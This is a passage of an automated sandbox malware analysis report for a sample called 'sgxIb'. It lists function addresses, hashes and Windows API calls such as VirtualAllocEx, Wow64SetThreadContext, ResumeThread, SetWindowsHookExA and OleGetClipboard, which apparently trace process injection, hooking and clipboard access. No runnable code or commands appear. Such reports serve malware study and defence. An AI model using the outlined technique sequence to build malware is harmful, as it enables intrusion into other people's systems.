                                        • Source File: 00000019.00000002.1989903821.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_7270000_sgxIb.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: 8417846faf190d17ecf6679b1689fa27a9985c289a8caaac2bb267ccf50ac31a
                                        • Instruction ID: 80a5f04e4f24390cf31247c9705213923d2b52c2e088d82e8d3e2bbee1293d3e
                                        • Opcode Fuzzy Hash: 8417846faf190d17ecf6679b1689fa27a9985c289a8caaac2bb267ccf50ac31a
                                        • Instruction Fuzzy Hash: B92139B190035D9FCB10DFAAC941ADEFBF5FF48310F508429E559A7250D7349554CBA4
                                        Function 07270960 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Wow64SetThreadContext.KERNELBASE(?,00000000), ref: 072709DE
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1989903821.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_7270000_sgxIb.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: 0f0bececc2b78ba14527dd8808e68c06ca684a8d761284d6835a122824d983b1
                                        • Instruction ID: f9475f8cab4c3d30761f16adaac630af432616bee34d6ed0c115ece6aba02d15
                                        • Opcode Fuzzy Hash: 0f0bececc2b78ba14527dd8808e68c06ca684a8d761284d6835a122824d983b1
                                        • Instruction Fuzzy Hash: EE212CB1900309CFDB10DFAAC5857EEBBF4EF49324F148429D459A7240D7789945CFA5
                                        Function 02CDDA40 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                        Download Yara Rule
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02CDDA0E,?,?,?,?,?), ref: 02CDDACF
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1978392701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_2cd0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 62431fbe92e4e5fdbee0c6297fa19120dc065dcc39a723d6a02b7ea0cff4e015
                                        • Instruction ID: a9ac2667f000344d631113c1b478193173ed299fa7988df831e83a290a186bd7
                                        • Opcode Fuzzy Hash: 62431fbe92e4e5fdbee0c6297fa19120dc065dcc39a723d6a02b7ea0cff4e015
                                        • Instruction Fuzzy Hash: 9121F3B6D00218DFDB10CFA9D584AEEBBF4FB48310F14841AE958A7350D378AA50CF64
                                        Function 072712A8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07271316
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1989903821.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_7270000_sgxIb.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: e6dcba322725dde2dfc7126fbd7ab53e9c312bb4f5a2541f39d0c04459d7b0c7
                                        • Instruction ID: 08992c5329120839024b78cb7d541aaeac17bad432c40826c9ce12ed1cd83b43
                                        • Opcode Fuzzy Hash: e6dcba322725dde2dfc7126fbd7ab53e9c312bb4f5a2541f39d0c04459d7b0c7
                                        • Instruction Fuzzy Hash: 931164B28002499FCB10DFAAC844BDFBFF5EF88320F208819E559A7250C735A950CFA4
                                        Function 072712A7 Relevance: 1.6, APIs: 1, Instructions: 51memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07271316
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1989903821.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_7270000_sgxIb.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 36cedcaaa6add800505677e2b751e9ac1ef07051a5a4292864b962a77c125e17
                                        • Instruction ID: f3501ed72d7ad079d715c7053f3e9c54cb58029cc91aa0a9d65b0695781f4572
                                        • Opcode Fuzzy Hash: 36cedcaaa6add800505677e2b751e9ac1ef07051a5a4292864b962a77c125e17
                                        • Instruction Fuzzy Hash: 481164B6800249CFCB10DFA9C945BEEBFF5EF88320F24881AE559A7250C7359550CFA0
                                        Function 072708AA Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1989903821.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_7270000_sgxIb.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 5a0b32410514c9c0f08e73ae5d63e2a9794ceb01039e0889ea22edba8d6ce69a
                                        • Instruction ID: d59eb9aa1e2f0734de20c971909530e71b4d0a46c8fb037b2335b2e07750d3ac
                                        • Opcode Fuzzy Hash: 5a0b32410514c9c0f08e73ae5d63e2a9794ceb01039e0889ea22edba8d6ce69a
                                        • Instruction Fuzzy Hash: F81128B1900259CFDB20DFA9C5447EFFBF5EB88324F24842AD459A7250C7755944CF94
                                        Function 072708B0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1989903821.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_7270000_sgxIb.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 3ff100878ed0d78498693b0fa56d2692f14010238875de11266b39f14c6c7a6d
                                        • Instruction ID: f74dfb83f6ba74db3ecff06b05462071041a03c9cb5f3ebb2cbfe2fc98c26278
                                        • Opcode Fuzzy Hash: 3ff100878ed0d78498693b0fa56d2692f14010238875de11266b39f14c6c7a6d
                                        • Instruction Fuzzy Hash: 8A1136B1900249CFDB20DFAAC4457EFFBF4EB88324F248429D459A7250CB75A944CFA4
                                        Function 07273230 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 07274F8D
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1989903821.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_7270000_sgxIb.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        • Opcode ID: 1184ded7182a8b5a27471801a584467443c8569ba4c9484631c486959bf1392f
                                        • Instruction ID: 8f3c83fcb75267832a814909afe423bde689ffd965eff6d4d6416a53dd1af515
                                        • Opcode Fuzzy Hash: 1184ded7182a8b5a27471801a584467443c8569ba4c9484631c486959bf1392f
                                        • Instruction Fuzzy Hash: AA1103B5810349DFDB10DF9AD989BDEBBF8FB48320F20841AE558A7210C375A944CFA5
                                        Function 02CDB358 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02CDB3BE
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1978392701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_2cd0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: b0bd4bfa5890ced4b7bc3f38a29cf9f5a11a2fc17d7e9866531e1b13038b611b
                                        • Instruction ID: d22c54e290559489b655b73504fd1bacbe4ad438472eff4d0d6aadc00363e515
                                        • Opcode Fuzzy Hash: b0bd4bfa5890ced4b7bc3f38a29cf9f5a11a2fc17d7e9866531e1b13038b611b
                                        • Instruction Fuzzy Hash: 791110B5C002498FCB10CF9AC444ADEFBF4AF88328F11842AD559A7210C375A545CFA1
                                        Function 07274F28 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 07274F8D
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1989903821.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_7270000_sgxIb.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        • Opcode ID: e95cc8cf1d1562ff3ea02afac6ff787337d7547248a540f3261582cd983b6843
                                        • Instruction ID: ecdcb51ffd80290b373ed22b06e8835d48e4e14b03d56226225d55341c4c30db
                                        • Opcode Fuzzy Hash: e95cc8cf1d1562ff3ea02afac6ff787337d7547248a540f3261582cd983b6843
                                        • Instruction Fuzzy Hash: B011FEB5800249DFDB10DF9AD585BEEBBF8FB48320F20841AE558A7210D375A984CFA5
                                        Function 0135D01C Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1978028705.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_135d000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 52bd5b2d2fe796e3a15039347b645bb4f94c2e7b75edff74aa1ddae65db6ce64
                                        • Instruction ID: 24768dfe764fadd9fb25fbc7600a5ef30a4e5c14ae70ec1366f301134e304ba4
                                        • Opcode Fuzzy Hash: 52bd5b2d2fe796e3a15039347b645bb4f94c2e7b75edff74aa1ddae65db6ce64
                                        • Instruction Fuzzy Hash: 34210071604204DFDB55DF58D984F26BBA5EB84B18F20C569DC0A4B256C33AD447CA61
                                        Function 0135D006 Relevance: .1, Instructions: 60COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1978028705.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_135d000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bb27c22c867705799f94c7498fe7f29a1ba2199b25176884e95cc5e95bc00ad6
                                        • Instruction ID: c3ee4896247a0d76e1554c2fd648679fa2710ddf1dc6ba8c48687fbf5a3d59c6
                                        • Opcode Fuzzy Hash: bb27c22c867705799f94c7498fe7f29a1ba2199b25176884e95cc5e95bc00ad6
                                        • Instruction Fuzzy Hash: 7A21A1755093808FDB03CF24D994B15BF71EB45218F28C5EAD8498F2A7C33AD40ACB62
                                        Function 0134D731 Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1977944695.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_134d000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 13b9e57387a81f6bb4db03f4544a3af26ff7625a87f615c9ff7be36323084e3d
                                        • Instruction ID: dbdd08610396583ffeb6c064379dfc9fcd40aa923c453d23212beddbecb8a914
                                        • Opcode Fuzzy Hash: 13b9e57387a81f6bb4db03f4544a3af26ff7625a87f615c9ff7be36323084e3d
                                        • Instruction Fuzzy Hash: 3A01F7310083849BE710CE69CDC4B67FFDCEF51368F18C42AED094A292C239E840C671
                                        Function 0134D730 Relevance: .0, Instructions: 36COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1977944695.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_134d000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0830e88f6e910df7858afc4c9c82673908195ac2c7f8bb0fcf08eeddd7420e50
                                        • Instruction ID: edf4d79ee8153987b2cf9a4a238a12dfad871e6b6d2ff136aae7b4ec9a27ba0d
                                        • Opcode Fuzzy Hash: 0830e88f6e910df7858afc4c9c82673908195ac2c7f8bb0fcf08eeddd7420e50
                                        • Instruction Fuzzy Hash: 60F0C2710043849FE7108E1ACCC4BA2FFE8EB91338F18C45AED080E282C279A840CA70

                                        Execution Graph

                                        Execution Coverage:12.5%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:194
                                        Total number of Limit Nodes:25
                                        execution_graph 39719 71a9b98 DuplicateHandle 39720 71a9c2e 39719->39720 39721 71ab5d8 39722 71ab5e3 39721->39722 39723 71ab5f3 39722->39723 39725 71ab048 39722->39725 39726 71ab628 OleInitialize 39725->39726 39727 71ab68c 39726->39727 39727->39723 39728 71a5c98 39729 71a5d00 CreateWindowExW 39728->39729 39731 71a5dbc 39729->39731 39731->39731 39840 32c0848 39842 32c084e 39840->39842 39841 32c091b 39842->39841 39845 32c1458 39842->39845 39852 32c1340 39842->39852 39846 32c1356 39845->39846 39847 32c1454 39846->39847 39850 32c1458 6 API calls 39846->39850 39860 32c80f9 39846->39860 39865 71a2fc7 39846->39865 39871 71a3008 39846->39871 39847->39842 39850->39846 39854 32c1343 39852->39854 39855 32c12c7 39852->39855 39853 32c1454 39853->39842 39854->39853 39856 32c1458 6 API calls 39854->39856 39857 71a3008 4 API calls 39854->39857 39858 71a2fc7 4 API calls 39854->39858 39859 32c80f9 2 API calls 39854->39859 39855->39842 39856->39854 39857->39854 39858->39854 39859->39854 39861 32c8103 39860->39861 39862 32c81b9 39861->39862 39877 71bfa78 39861->39877 39881 71bfa88 39861->39881 39862->39846 39866 71a2fdd 39865->39866 39870 71a30cb 39866->39870 39885 71a2d04 39866->39885 39868 71a3091 39890 71a2d24 39868->39890 39870->39846 39872 71a301a 39871->39872 39873 71a2d04 3 API calls 39872->39873 39876 71a30cb 39872->39876 39874 71a3091 39873->39874 39875 71a2d24 KiUserCallbackDispatcher 39874->39875 39875->39876 39876->39846 39878 71bfa88 39877->39878 39879 71bfcae 39878->39879 39880 71bfcc9 GlobalMemoryStatusEx GlobalMemoryStatusEx 39878->39880 39879->39862 39880->39878 39882 71bfa9d 39881->39882 39883 71bfcae 39882->39883 39884 71bfcc9 GlobalMemoryStatusEx GlobalMemoryStatusEx 39882->39884 39883->39862 39884->39882 39886 71a2d0f 39885->39886 39894 71a41c8 39886->39894 39901 71a41b3 39886->39901 39887 71a326a 39887->39868 39891 71a2d2f 39890->39891 39893 71aad4b 39891->39893 39944 71a97a4 39891->39944 39893->39870 39895 71a41f3 39894->39895 39908 71a4740 39895->39908 39913 71a4731 39895->39913 39896 71a4276 39897 71a3714 GetModuleHandleW 39896->39897 39898 71a42a2 39896->39898 39897->39898 39902 71a41c8 39901->39902 39906 71a4740 3 API calls 39902->39906 39907 71a4731 3 API calls 39902->39907 39903 71a4276 39904 71a3714 GetModuleHandleW 39903->39904 39905 71a42a2 39903->39905 39904->39905 39906->39903 39907->39903 39909 71a476d 39908->39909 39910 71a47ee 39909->39910 39918 71a490f 39909->39918 39929 71a4992 39909->39929 39915 71a4740 39913->39915 39914 71a47ee 39915->39914 39916 71a490f 2 API calls 39915->39916 39917 71a4992 2 API calls 39915->39917 39916->39914 39917->39914 39919 71a491a 39918->39919 39940 71a3714 39919->39940 39921 71a4a3a 39922 71a3714 GetModuleHandleW 39921->39922 39927 71a4ab4 39921->39927 39923 71a4a88 39922->39923 39925 71a3714 GetModuleHandleW 39923->39925 39923->39927 39924 71a4bce 39924->39910 39925->39927 39926 71a4c38 GetModuleHandleW 39928 71a4c65 39926->39928 39927->39910 39927->39924 39927->39926 39928->39910 39932 71a49cf 39929->39932 39937 71a4a39 39929->39937 39930 71a3714 GetModuleHandleW 39931 71a4a88 39930->39931 39935 71a3714 GetModuleHandleW 39931->39935 39938 71a4ab4 39931->39938 39934 71a3714 GetModuleHandleW 39932->39934 39933 71a4bce 39933->39910 39934->39937 39935->39938 39936 71a4c38 GetModuleHandleW 39939 71a4c65 39936->39939 39937->39930 39937->39938 39938->39910 39938->39933 39938->39936 39939->39910 39941 71a4bf0 GetModuleHandleW 39940->39941 39943 71a4c65 39941->39943 39943->39921 39945 71aad60 KiUserCallbackDispatcher 39944->39945 39947 71aadce 39945->39947 39947->39891 39732 177d030 39733 177d048 39732->39733 39734 177d0a2 39733->39734 39739 71a384c 39733->39739 39747 71a5e50 39733->39747 39751 71a5e42 39733->39751 39755 71aa772 39733->39755 39740 71a3857 39739->39740 39741 71aa801 39740->39741 39744 71aa7f1 39740->39744 39742 71aa7ff 39741->39742 39776 71a974c 39741->39776 39764 71aa918 39744->39764 39770 71aa928 39744->39770 39748 71a5e76 39747->39748 39749 71a384c 2 API calls 39748->39749 39750 71a5e97 39749->39750 39750->39734 39752 71a5e50 39751->39752 39753 71a384c 2 API calls 39752->39753 39754 71a5e97 39753->39754 39754->39734 39756 71aa77a 39755->39756 39759 71aa78a 39755->39759 39756->39734 39757 71aa801 39758 71a974c 2 API calls 39757->39758 39761 71aa7ff 39757->39761 39758->39761 39759->39757 39760 71aa7f1 39759->39760 39762 71aa918 2 API calls 39760->39762 39763 71aa928 2 API calls 39760->39763 39762->39761 39763->39761 39766 71aa928 39764->39766 39765 71a974c 2 API calls 39765->39766 39766->39765 39767 71aaa0e 39766->39767 39783 71aae00 39766->39783 39788 71aadf0 39766->39788 39767->39742 39772 71aa936 39770->39772 39771 71a974c 2 API calls 39771->39772 39772->39771 39773 71aaa0e 39772->39773 39774 71aae00 OleGetClipboard 39772->39774 39775 71aadf0 OleGetClipboard 39772->39775 39773->39742 39774->39772 39775->39772 39777 71a9757 39776->39777 39778 71aaa6a 39777->39778 39779 71aab14 39777->39779 39781 71aaac2 CallWindowProcW 39778->39781 39782 71aaa71 39778->39782 39780 71a384c OleGetClipboard 39779->39780 39780->39782 39781->39782 39782->39742 39784 71aae1f 39783->39784 39785 71aae76 39784->39785 39793 71ab3b8 39784->39793 39799 71ab377 39784->39799 39785->39766 39789 71aadf6 39788->39789 39790 71aade6 39789->39790 39791 71ab3b8 OleGetClipboard 39789->39791 39792 71ab377 OleGetClipboard 39789->39792 39790->39766 39791->39789 39792->39789 39795 71ab3c0 39793->39795 39794 71ab3d4 39794->39784 39795->39794 39805 71ab3f2 39795->39805 39816 71ab400 39795->39816 39796 71ab3e9 39796->39784 39801 71ab38d 39799->39801 39800 71ab3d4 39800->39784 39801->39800 39803 71ab3f2 OleGetClipboard 39801->39803 39804 71ab400 OleGetClipboard 39801->39804 39802 71ab3e9 39802->39784 39803->39802 39804->39802 39806 71ab3fa 39805->39806 39807 71ab42d 39806->39807 39809 71ab471 39806->39809 39814 71ab3f2 OleGetClipboard 39807->39814 39815 71ab400 OleGetClipboard 39807->39815 39808 71ab433 39808->39796 39811 71ab4f1 39809->39811 39827 71ab6b8 39809->39827 39832 71ab6c8 39809->39832 39810 71ab50f 39810->39796 39811->39796 39814->39808 39815->39808 39817 71ab412 39816->39817 39818 71ab42d 39817->39818 39820 71ab471 39817->39820 39823 71ab3f2 OleGetClipboard 39818->39823 39824 71ab400 OleGetClipboard 39818->39824 39819 71ab433 39819->39796 39822 71ab4f1 39820->39822 39825 71ab6b8 OleGetClipboard 39820->39825 39826 71ab6c8 OleGetClipboard 39820->39826 39821 71ab50f 39821->39796 39822->39796 39823->39819 39824->39819 39825->39821 39826->39821 39828 71ab6a6 39827->39828 39830 71ab6c6 39827->39830 39828->39810 39831 71ab703 39830->39831 39836 71ab160 39830->39836 39831->39810 39834 71ab6dd 39832->39834 39833 71ab160 OleGetClipboard 39833->39834 39834->39833 39835 71ab703 39834->39835 39835->39810 39837 71ab770 OleGetClipboard 39836->39837 39839 71ab80a 39837->39839 39948 71ad2b0 39949 71ad2f4 SetWindowsHookExA 39948->39949 39951 71ad33a 39949->39951

                                        Executed Functions

                                        Function 071B6708 Relevance: .8, Instructions: 822COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4195241370.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71b0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 55ec273c7a52c02d8105db08300178169bba36419def3be9763e5b9b2f7d41cc
                                        • Instruction ID: 66106be9c3fdfa097d754ac709c7a84c4ada437d0428eb79fa604526fb73b69d
                                        • Opcode Fuzzy Hash: 55ec273c7a52c02d8105db08300178169bba36419def3be9763e5b9b2f7d41cc
                                        • Instruction Fuzzy Hash: 1462AE74B002059FDB25DB68D584AADB7F2FF89314F148469E809EB390DB35ED86CB90
                                        Function 068F2148 Relevance: 4.1, Strings: 3, Instructions: 350COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 583 68f2148-68f216d 585 68f2173-68f2175 583->585 586 68f22c2-68f22e6 583->586 587 68f22ed-68f2372 585->587 588 68f217b-68f2184 585->588 586->587 622 68f2378-68f238b 587->622 623 68f2433 587->623 589 68f2197-68f21be 588->589 590 68f2186-68f2194 588->590 594 68f2248-68f224c 589->594 595 68f21c4-68f21d7 call 68f1e34 589->595 590->589 596 68f224e-68f227b call 68f1e44 594->596 597 68f2283-68f229c 594->597 595->594 609 68f21d9-68f222c 595->609 616 68f2280 596->616 604 68f229e 597->604 605 68f22a6-68f22a7 597->605 604->605 605->586 609->594 617 68f222e-68f2241 609->617 616->597 617->594 622->623 628 68f2391-68f239d 622->628 625 68f2438-68f2443 623->625 629 68f244a-68f2473 625->629 628->625 631 68f23a3-68f23ce 628->631 633 68f247f-68f2554 629->633 634 68f2475-68f247e 629->634 631->623 642 68f23d0-68f23dc 631->642 655 68f255a-68f2568 633->655 643 68f23de-68f23e1 642->643 644 68f2428-68f2432 642->644 645 68f23e4-68f23ed 643->645 645->629 647 68f23ef-68f240a 645->647 649 68f240c-68f240e 647->649 650 68f2412-68f2415 647->650 649->623 652 68f2410 649->652 650->623 651 68f2417-68f2426 650->651 651->644 651->645 652->651 656 68f256a-68f2570 655->656 657 68f2571-68f25a9 655->657 656->657 661 68f25ab-68f25af 657->661 662 68f25b9 657->662 661->662 663 68f25b1 661->663 664 68f25ba 662->664 663->662 664->664
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4190477887.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_68f0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (bq$(bq$(bq
                                        • API String ID: 0-2716923250
                                        • Opcode ID: 0e3b0bb3ac7e969bf47f0c8c1196849e4e762c4eeb488b2e977e71881e9be8c7
                                        • Instruction ID: 4ab5845a5c7b13eadaeec68a1e04d5519bc3fe2318b933ca8299006dfb707734
                                        • Opcode Fuzzy Hash: 0e3b0bb3ac7e969bf47f0c8c1196849e4e762c4eeb488b2e977e71881e9be8c7
                                        • Instruction Fuzzy Hash: A3D1BE70E102099FCB54DFA9C8646AEBBF2FF89310F148569D505EB390DB74AD41CB91
                                        Function 032CED70 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4162490899.00000000032C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_32c0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c691155e7c3dfb8da79a1702d75461a43aa4b89eb59e7c74ae9be4cb9cb3b71f
                                        • Instruction ID: 1a209947cbbdbd70c697ee80611052a390a90563d7cd2b27940b6104c07877f3
                                        • Opcode Fuzzy Hash: c691155e7c3dfb8da79a1702d75461a43aa4b89eb59e7c74ae9be4cb9cb3b71f
                                        • Instruction Fuzzy Hash: 85414471D1479A9FC710CF79D8002EEBBF5EF89310F15866AD804A7281DB749882CBD0
                                        Function 071A5C92 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 071A5DAA
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4194879620.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71a0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0
                                        • Opcode ID: f6a19abb0d61a5658c250b67dc9b5b6f9e8c65cce27b00380789783746279816
                                        • Instruction ID: fe9b2533bcb1a6f0d2332b75f714a21222fc11d8161c5adf0fd815277834bda7
                                        • Opcode Fuzzy Hash: f6a19abb0d61a5658c250b67dc9b5b6f9e8c65cce27b00380789783746279816
                                        • Instruction Fuzzy Hash: 9851C0B5D10349AFDB14CFA9D984ADEBFB5FF48310F24812AE418AB250D7719845CF91
                                        Function 071A5C98 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 071A5DAA
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4194879620.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71a0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0
                                        • Opcode ID: dea22d5d75ee4dffc600f7c8fbe13f3a04ad34631b6dec85cd1351f7de8853e0
                                        • Instruction ID: 46567a270dc43535b2d20455b365dedfc1e0864c7ff2c09a144c78c51904ec80
                                        • Opcode Fuzzy Hash: dea22d5d75ee4dffc600f7c8fbe13f3a04ad34631b6dec85cd1351f7de8853e0
                                        • Instruction Fuzzy Hash: 0041E0B5D10309EFDB14CFA9C984ADEBBB6FF48310F24812AE818AB250D7719845CF90
                                        Function 071A4B5A Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 071A4C56
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4194879620.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71a0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 269500fa55af3d672306237a9acead623c7db207cd5d305a6408998877b340f2
                                        • Instruction ID: 59f7db7e38309ca04c23060c1f9d6bd0a9b5773525355d17d36d270df87b13c1
                                        • Opcode Fuzzy Hash: 269500fa55af3d672306237a9acead623c7db207cd5d305a6408998877b340f2
                                        • Instruction Fuzzy Hash: F43186B4A007858FCB05CFB9C05429EFBF1AF89314F24846EC459AB291DB74A906CFA5
                                        Function 071A974C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                        Download Yara Rule
                                        APIs
                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 071AAAE9
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4194879620.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71a0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: CallProcWindow
                                        • String ID:
                                        • API String ID: 2714655100-0
                                        • Opcode ID: 44380adb8483b1ac4bec0b8f48c64673297debae1b5c6a6bd3e3f8559da25500
                                        • Instruction ID: fbfcb754e198136e1e8717c0420dccb2b7e0f36ec5c3e49092626ae2dd2d2ce1
                                        • Opcode Fuzzy Hash: 44380adb8483b1ac4bec0b8f48c64673297debae1b5c6a6bd3e3f8559da25500
                                        • Instruction Fuzzy Hash: 664159B8A00305DFCB14CF99C588AAABBF5FF88314F24C459E519AB361D734A941CFA0
                                        Function 071AB765 Relevance: 1.6, APIs: 1, Instructions: 75comclipboardCOMMON
                                        Download Yara Rule
